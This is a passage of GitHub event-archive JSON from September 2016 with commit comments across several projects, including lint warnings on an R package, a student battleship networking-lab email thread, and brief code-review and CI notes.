operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n"}},"created_at":"2016-09-18T21:04:10Z"}
{"id":"4580628526","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19072264,"position":null,"line":null,"path":null,"commit_id":"f5f580e651dc26c0f1d5a4d0db602e58852fc77d","created_at":"2016-09-18T21:04:13Z","updated_at":"2016-09-18T21:04:13Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;2HZ3l7cW&#x2F;4-optimizations-when-needed\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Optimizations (when needed)</a>"}},"created_at":"2016-09-18T21:04:13Z"}
{"id":"4580628752","type":"CommitCommentEvent","actor":{"login":"joshuaknox"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19072265,"position":null,"line":null,"path":null,"commit_id":"a62da5bac9eeee8f4802acd868fbc77427fd5b91","created_at":"2016-09-18T21:04:21Z","updated_at":"2016-09-18T21:04:21Z","body":"@dakrone - I'm happy to see this reverted (https://github.com/dakrone/clj-http/commit/8edc6c4ee696d879b7cfe230481abbd351771593#commitcomment-16038808 for the wayback machine).  \r\n\r\nWould it be possible to cut a tag for the state of current master?  It's a little awkward for semver as 2.0.0 is the last release without the broken behavior.\r\n\r\n"}},"created_at":"2016-09-18T21:04:21Z"}
{"id":"4580631654","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19072271,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-18T21:06:12Z","updated_at":"2016-09-18T21:06:12Z","body":"Hi , i have download and compile this Tweak . i don't know how to use it. Can you upload one Wiki? \r\n\r\nPS: iOS 9 haven't UIAllertView , now you need to use UIAllertController."}},"created_at":"2016-09-18T21:06:12Z"}
{"id":"4580634666","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19072275,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T21:08:01Z","updated_at":"2016-09-18T21:08:01Z","body":"I don't think we will be able to use the socket library for http, I am\nlooking at a few http libraries but need learn how to use them,\nexperimenting now. Someone else can start working on the board maintenance\nlike read_board() or update_board() in the server.py. These methods will\nreceive a string or chars of x,y coords, read_board() can return a string\nor char for hit miss or sunk to be passed to another method.\n\nOn Sun, Sep 18, 2016 at 2:26 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> I got some syntax errors fixed in server.py and it will run, but with the\n> while(1) infinite loop you have to go into the task manager to kill the\n> process since you have to run it from the command line to send in\n> arguments. We wont have to worry about it once the client stuff is more\n> complete to where the client will close the connection and the server wont\n> get stuck in a loop.\n>\n>\n> On Sun, Sep 18, 2016 at 2:23 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> I got the file reading to the 2d array working.......kinda. There is an\n>> additional element on each row of the array to hold the new line char. This\n>> was the easiest without having to read a line from the text file, strip the\n>> /n, then change the string into chars, then put it in the array. Maybe\n>> later use the numpy library to make this nicer? I just wanted to get it\n>> working so we can move on and get more done. I left the variable for the\n>> width at 10 so we can still use this to check for a shot out of bounds.\n>>\n>> On Sun, Sep 18, 2016 at 1:28 PM, David Schwehr <dpschwehr@gmail.com>\n>> wrote:\n>>\n>>> I got reading the file and filling the array to work but I can't omitt\n>>> the newline character. Supossedly there is a strip('/n') that should work\n>>> with reading a file line by line but we need to read char by char. If you\n>>> were able to leave out the /n than that is farther than I got.\n>>>\n>>> On Sun, Sep 18, 2016 at 1:24 PM, Emmanuel-Armstrong <\n>>> notifications@github.com> wrote:\n>>>\n>>>> Oh crap I just realized, I've done some work on the file reading and\n>>>> writing but I totally forgot to push it up to git! I'll see if I have\n>>>> any\n>>>> more than you and if so I'll push up what I have when I get home from\n>>>> work\n>>>> in a couple hours. Sorry about that!\n>>>>\n>>>>\n>>>> On Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com> wrote:\n>>>>\n>>>> > I've started working with reading in the board file and filling the\n>>>> array,\n>>>> > about half success now. Once the board array is filled we can start\n>>>> working\n>>>> > on the rest. Not sure if we want to make a nother text file for the\n>>>> client\n>>>> > to keep track of the board since the client is re-invoked each time.\n>>>> Can't\n>>>> > really use an array since the program is restarted each time but\n>>>> writing to\n>>>> > a file from an array could be a pain. I will finish the server side\n>>>> > creating the board array first, might use a list within a list.\n>>>> > What do you guys want to work on or feel comfortable about working on?\n>>>> >\n>>>> > David\n>>>> >\n>>>> > On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com>\n>>>> > wrote:\n>>>> >\n>>>> > > Just checked, the address for localhost is correct, the port\n>>>> numbers and\n>>>> > > ip being set from command line arguments is already implemented and\n>>>> I\n>>>> > > checked the connection already. I was going to play around with\n>>>> different\n>>>> > > ways of making the board and http stuff next. I put a board.txt\n>>>> file in\n>>>> > the\n>>>> > > folder too to use to test reading the file and creating an array or\n>>>> list\n>>>> > of\n>>>> > > lists for the board.\n>>>> > > Remember to git pull before working on anything to make sure you\n>>>> have the\n>>>> > > most recent version.\n>>>> > > I will be working on it some tonight and spending most the day on it\n>>>> > > tomorrow.\n>>>> > >\n>>>> > > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com\n>>>> >\n>>>> > > wrote:\n>>>> > >\n>>>> > >> Right now the server is on 127.0.0.1( i may have the address wrong\n>>>> but\n>>>> > it\n>>>> > >> should be the address of localhost, which is the same no matter\n>>>> what\n>>>> > >> machine it is running on) just to run it on your local machine to\n>>>> test,\n>>>> > it\n>>>> > >> will be changed to the ip address of the machine it is running on\n>>>> when\n>>>> > they\n>>>> > >> grade it.\n>>>> > >>\n>>>> > >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <\n>>>> dpschwehr@gmail.com>\n>>>> > >> wrote:\n>>>> > >>\n>>>> > >>> It is getting the fire commands from the command line arguments,\n>>>> that\n>>>> > is\n>>>> > >>> why the client is being invoked every play. The connection is made\n>>>> > with the\n>>>> > >>> port number and IP address passed in from the command line\n>>>> arguments. I\n>>>> > >>> have already wrote the code for the connection using the socket\n>>>> > library.\n>>>> > >>> Thev ariables for the x and y coords passed from the command line\n>>>> are\n>>>> > >>> working just as you had them in your test.py, I added it to the\n>>>> > client.py\n>>>> > >>> file already. These variable will be used in the methods that\n>>>> send the\n>>>> > http\n>>>> > >>> message. The http and passing in the variable I think will be the\n>>>> easy\n>>>> > >>> part, some of it is done and it works. The time consuming part is\n>>>> > going to\n>>>> > >>> be writing the code to maintain the board and \"serving\" the\n>>>> display of\n>>>> > the\n>>>> > >>> board.\n>>>> > >>> Tracking sunk ships will work as you suggested and this will be\n>>>> put in\n>>>> > a\n>>>> > >>> method called from read_board or process_reply or done inside of\n>>>> > >>> process_reply.\n>>>> > >>>\n>>>> > >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n>>>> > >>> notifications@github.com> wrote:\n>>>> > >>>\n>>>> > >>>> I was thinking about tracking sunk ships. Just a thought, but\n>>>> what if\n>>>> > >>>> we had a global variable for each ship (carrier = 5), and every\n>>>> time\n>>>> > we hit\n>>>> > >>>> that type of ship we decrement that value, and compare it to 0.\n>>>> so if\n>>>> > >>>> carrier gets to 0 then it has been hit 5 times which is the same\n>>>> > thing as\n>>>> > >>>> being sunk.\n>>>> > >>>>\n>>>> > >>>> —\n>>>> > >>>> You are receiving this because you authored the thread.\n>>>> > >>>> Reply to this email directly, view it on GitHub\n>>>> > >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n>>>> > 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>>>> > >>>> or mute the thread\n>>>> > >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6g\n>>>> kDXIV5_\n>>>> > YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>>>> > >>>> .\n>>>> > >>>>\n>>>> > >>>\n>>>> > >>>\n>>>> > >>\n>>>> > >\n>>>> >\n>>>> > —\n>>>> > You are receiving this because you commented.\n>>>> > Reply to this email directly, view it on GitHub\n>>>> > <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1b\n>>>> a8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n>>>> > or mute the thread\n>>>> > <https://github.com/notifications/unsubscribe-auth/ANiCOS9eO\n>>>> _caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n>>>>\n>>>> > .\n>>>> >\n>>>>\n>>>> —\n>>>> You are receiving this because you authored the thread.\n>>>> Reply to this email directly, view it on GitHub\n>>>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071958>,\n>>>> or mute the thread\n>>>> <https://github.com/notifications/unsubscribe-auth/AE8DG5F6ycythOV16iTCINZqZXSNnY3Fks5qrZAFgaJpZM4J_dYG>\n>>>> .\n>>>>\n>>>\n>>>\n>>\n>\n"}},"created_at":"2016-09-18T21:08:01Z"}
{"id":"4580635593","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":19072277,"position":6,"line":37,"path":"inexor/util/uuid.cpp","commit_id":"8c235a7a5bb48c524148b0803a691f807ca01e4d","created_at":"2016-09-18T21:08:33Z","updated_at":"2016-09-18T21:08:33Z","body":"This has **NOT** been tested yet!"}},"created_at":"2016-09-18T21:08:33Z"}
{"id":"4580637880","type":"CommitCommentEvent","actor":{"login":"IOBYTE"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19072279,"position":null,"line":null,"path":null,"commit_id":"997a3cd9cacad255a5e68e3e6b77ded26f65998d","created_at":"2016-09-18T21:09:57Z","updated_at":"2016-09-18T21:09:57Z","body":"I'm getting header files when I expand a cpp file on linux:\r\n```\r\n> dir1/file1.cpp\r\n      dir2/file2.h\r\n```\r\nand the header file are repeated for each cpp file in the directory"}},"created_at":"2016-09-18T21:09:57Z"}
{"id":"4580638106","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":19072280,"position":null,"line":null,"path":null,"commit_id":"a7a5fa41a38b4cd7cf55aa24444728f7626da7c8","created_at":"2016-09-18T21:10:04Z","updated_at":"2016-09-18T21:10:04Z","body":"Thanks!"}},"created_at":"2016-09-18T21:10:04Z"}
{"id":"4580640477","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19072283,"position":null,"line":null,"path":null,"commit_id":"066447c24f4339ab37566a1cbbde2a390f16a94e","created_at":"2016-09-18T21:11:21Z","updated_at":"2016-09-18T21:11:21Z","body":"Bravo, good job!"}},"created_at":"2016-09-18T21:11:21Z"}
{"id":"4580641897","type":"CommitCommentEvent","actor":{"login":"AndroFox"},"repo":{"name":"AndroFox/asrielborg"},"payload":{"comment":{"id":19072285,"position":null,"line":null,"path":null,"commit_id":"44550a6b430de6908969e204efeaaa6f0d10b935","created_at":"2016-09-18T21:12:11Z","updated_at":"2016-09-18T21:12:11Z","body":"Wrong version number. This is version 1.0.0."}},"created_at":"2016-09-18T21:12:11Z"}
{"id":"4580642567","type":"CommitCommentEvent","actor":{"login":"AndroFox"},"repo":{"name":"AndroFox/asrielborg"},"payload":{"comment":{"id":19072287,"position":null,"line":null,"path":null,"commit_id":"4957528e066cad6ed0a344e707942f8ebfcf0b03","created_at":"2016-09-18T21:12:34Z","updated_at":"2016-09-18T21:12:34Z","body":"Wrong version number. This is version 1.0.0."}},"created_at":"2016-09-18T21:12:34Z"}
{"id":"4580642789","type":"CommitCommentEvent","actor":{"login":"ozdefir"},"repo":{"name":"ozdefir/oku-player"},"payload":{"comment":{"id":19072289,"position":null,"line":null,"path":null,"commit_id":"f4debead7ff26e6c24a484884a14adb6f73587ee","created_at":"2016-09-18T21:12:42Z","updated_at":"2016-09-18T21:12:42Z","body":"Bug fixes for iOS, next/previous chapter setting, night mode"}},"created_at":"2016-09-18T21:12:42Z"}
{"id":"4580643101","type":"CommitCommentEvent","actor":{"login":"ratoaq2"},"repo":{"name":"guessit-io/guessit"},"payload":{"comment":{"id":19072290,"position":18,"line":35,"path":"guessit/rules/properties/audio_codec.py","commit_id":"232ef2b0beabe5c6d3f066918b674ca417570b88","created_at":"2016-09-18T21:12:54Z","updated_at":"2016-09-18T21:12:54Z","body":"Shouldn't be `in` instead of `==` ? "}},"created_at":"2016-09-18T21:12:54Z"}
{"id":"4580643244","type":"CommitCommentEvent","actor":{"login":"garranhado"},"repo":{"name":"PopcornTimeTV/PopcornTimeTV"},"payload":{"comment":{"id":19072291,"position":null,"line":null,"path":null,"commit_id":"a60efb55fb5d81ffc5dace4b90eb8f4e0e9d14c3","created_at":"2016-09-18T21:12:59Z","updated_at":"2016-09-18T21:12:59Z","body":"Worked :)\r\n\r\n1. iOS App Signer (selected my development + * provisioning)\r\n2. Use Xcode (devices) to install\r\n\r\nHope you share a IPA for every stable release."}},"created_at":"2016-09-18T21:12:59Z"}
{"id":"4580644140","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19072293,"position":null,"line":null,"path":null,"commit_id":"9c13370ec33dad0e4f096447dbc5fd597f06d75a","created_at":"2016-09-18T21:13:32Z","updated_at":"2016-09-18T21:13:32Z","body":"what about nukkit's food system?"}},"created_at":"2016-09-18T21:13:32Z"}
{"id":"4580645662","type":"CommitCommentEvent","actor":{"login":"Toilal"},"repo":{"name":"guessit-io/guessit"},"payload":{"comment":{"id":19072295,"position":18,"line":35,"path":"guessit/rules/properties/audio_codec.py","commit_id":"232ef2b0beabe5c6d3f066918b674ca417570b88","created_at":"2016-09-18T21:14:27Z","updated_at":"2016-09-18T21:14:27Z","body":"Yes ! I just shut down the computer, so i'll fix it tomorrow ! Thanks for\ncode reviews again ☺️\n\nLe 18 sept. 2016 11:12 PM, \"Rato\" <notifications@github.com> a écrit :\n\n> Shouldn't be in instead of == ?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/guessit-io/guessit/commit/232ef2b0beabe5c6d3f066918b674ca417570b88#commitcomment-19072290>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABHJvm4FszNlxdJ6w6OZA-hJZP5jWem0ks5qralWgaJpZM4KABMR>\n> .\n>\n"}},"created_at":"2016-09-18T21:14:27Z"}
{"id":"4580645740","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19072296,"position":null,"line":null,"path":null,"commit_id":"b352d0c4611ccc51eff0c643322e3bc3a9bb416f","created_at":"2016-09-18T21:14:29Z","updated_at":"2016-09-18T21:14:29Z","body":"Thanks, perhaps hash size is too big, could you please test reverting last\ncommit to 256 instead of 16348?\n\n\n\nOn Sunday, September 18, 2016, Stéphane Nicolet <notifications@github.com>\nwrote:\n\n> For what it's worth, I measured a 1.3% slowdown (non-pgo build):\n>\n> Total time (ms) : 148221\n> Nodes searched : 202696778\n> Nodes/second : 1367530\n> master\n>\n> Total time (ms) : 150193\n> Nodes searched : 202696778\n> Nodes/second : 1349575\n> testedpatch\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mcostalba/Stockfish/commit/b352d0c4611ccc51eff0c643322e3bc3a9bb416f#commitcomment-19072127>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAVavcYkRLayisNTaAUwrdc564rJDks5qrZ1DgaJpZM4J__O4>\n> .\n>\n"}},"created_at":"2016-09-18T21:14:29Z"}
{"id":"4580645966","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"neokt/dsp"},"payload":{"comment":{"id":19072297,"position":null,"line":null,"path":null,"commit_id":"f373d721799858ce4f0a038e9bcfe8baa7d9d86f","created_at":"2016-09-18T21:14:37Z","updated_at":"2016-09-18T21:14:37Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @neokt \r\n\r\nNice work with advanced Python!\r\n\r\n👍 "}},"created_at":"2016-09-18T21:14:37Z"}
{"id":"4580647191","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19072299,"position":null,"line":null,"path":null,"commit_id":"64e35c1c9b7490c92713b0bdba2c70b02df78e94","created_at":"2016-09-18T21:15:21Z","updated_at":"2016-09-18T21:15:21Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/52/violations\n```\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:176:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/tiff_utils.py:73:1: C901 '_translate_field_type' is too complex (13)\nplone/namedfile/utils/tiff_utils.py:98:80: E501 line too long (89 > 79 characters)\nplone/namedfile/utils/tiff_utils.py:100:80: E501 line too long (88 > 79 characters)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-18T21:15:21Z"}
{"id":"4580647774","type":"CommitCommentEvent","actor":{"login":"otakup0pe"},"repo":{"name":"AudaxHealthInc/aws-cookbook-public"},"payload":{"comment":{"id":19072300,"position":null,"line":null,"path":null,"commit_id":"3e82b9ce03cfd4c5eae14de499b156607d21b705","created_at":"2016-09-18T21:15:44Z","updated_at":"2016-09-18T21:15:44Z","body":"yup it's a test 😈 "}},"created_at":"2016-09-18T21:15:44Z"}
{"id":"4580649690","type":"CommitCommentEvent","actor":{"login":"remotevase"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19072305,"position":null,"line":null,"path":null,"commit_id":"0d9f89f69732dcdff0b8448de36266fa77bd5976","created_at":"2016-09-18T21:16:55Z","updated_at":"2016-09-18T21:16:55Z","body":"Oh xd"}},"created_at":"2016-09-18T21:16:55Z"}
{"id":"4580652219","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"neokt/dsp"},"payload":{"comment":{"id":19072309,"position":null,"line":null,"path":null,"commit_id":"a69a0ebf4740ffa1577b64ca3f1a3de8596cad16","created_at":"2016-09-18T21:18:32Z","updated_at":"2016-09-18T21:18:32Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @neokt \r\n\r\nGreat work on the linear algebra problems!\r\n\r\n👍 "}},"created_at":"2016-09-18T21:18:32Z"}
{"id":"4580654179","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":19072311,"position":null,"line":null,"path":null,"commit_id":"69b041f240dc1b6239f51159ee4bd97e596ee7d5","created_at":"2016-09-18T21:19:49Z","updated_at":"2016-09-18T21:19:49Z","body":"> Thanks to you too!\n\nDo you actually use this package?  I never thought that people outside\nof my company would use this, but if you do, it could be worth it to\nmake this package more generic.\n"}},"created_at":"2016-09-18T21:19:49Z"}
{"id":"4580660375","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"satya164/ex-navigation"},"payload":{"comment":{"id":19072313,"position":15,"line":15,"path":"example/ExNavigationExample/components/TranslucentBarExample.js","commit_id":"52944e4deb1214085c3acb8c3853bcbd8758761c","created_at":"2016-09-18T21:23:39Z","updated_at":"2016-09-18T21:23:39Z","body":"At top of the file, modules to preload can be specified."}},"created_at":"2016-09-18T21:23:39Z"}
{"id":"4580662333","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"satya164/ex-navigation"},"payload":{"comment":{"id":19072314,"position":24,"line":44,"path":"example/ExNavigationExample/main.js","commit_id":"52944e4deb1214085c3acb8c3853bcbd8758761c","created_at":"2016-09-18T21:24:57Z","updated_at":"2016-09-18T21:24:57Z","body":"The user can use `AssetLoader.loadAssetsAsync()` to wait for assets to be loaded, or use the `<AssetLoader />` component."}},"created_at":"2016-09-18T21:24:57Z"}
{"id":"4580663257","type":"CommitCommentEvent","actor":{"login":"JohnMcLear"},"repo":{"name":"jdittrich/ep_autocomp"},"payload":{"comment":{"id":19072315,"position":null,"line":null,"path":null,"commit_id":"85ac4979effcba77d55681e88777c15d36f349ca","created_at":"2016-09-18T21:25:32Z","updated_at":"2016-09-18T21:25:32Z","body":"Just me being lazy -_-"}},"created_at":"2016-09-18T21:25:32Z"}
{"id":"4580665058","type":"CommitCommentEvent","actor":{"login":"arturopuente"},"repo":{"name":"platanus/active_material"},"payload":{"comment":{"id":19072317,"position":null,"line":null,"path":null,"commit_id":"e2902423ea0fe81504b0baa7b74efa121f8f2cfa","created_at":"2016-09-18T21:26:41Z","updated_at":"2016-09-18T21:26:41Z","body":"@aelesbao yes, we planned to work on solving some issues with ActiveMaterial, submitting a pull request and transfer the gem authorship to the original creators, but since our work has diverged from that plan, I'll be deleting this fork tomorrow. Sorry for any issues this may have caused!"}},"created_at":"2016-09-18T21:26:41Z"}
{"id":"4580666087","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19072319,"position":null,"line":null,"path":null,"commit_id":"4b3f1d712b845a44a0d2680197cfb6c3fe4478bd","created_at":"2016-09-18T21:27:16Z","updated_at":"2016-09-18T21:27:16Z","body":"@dpgeorge : FYI"}},"created_at":"2016-09-18T21:27:16Z"}
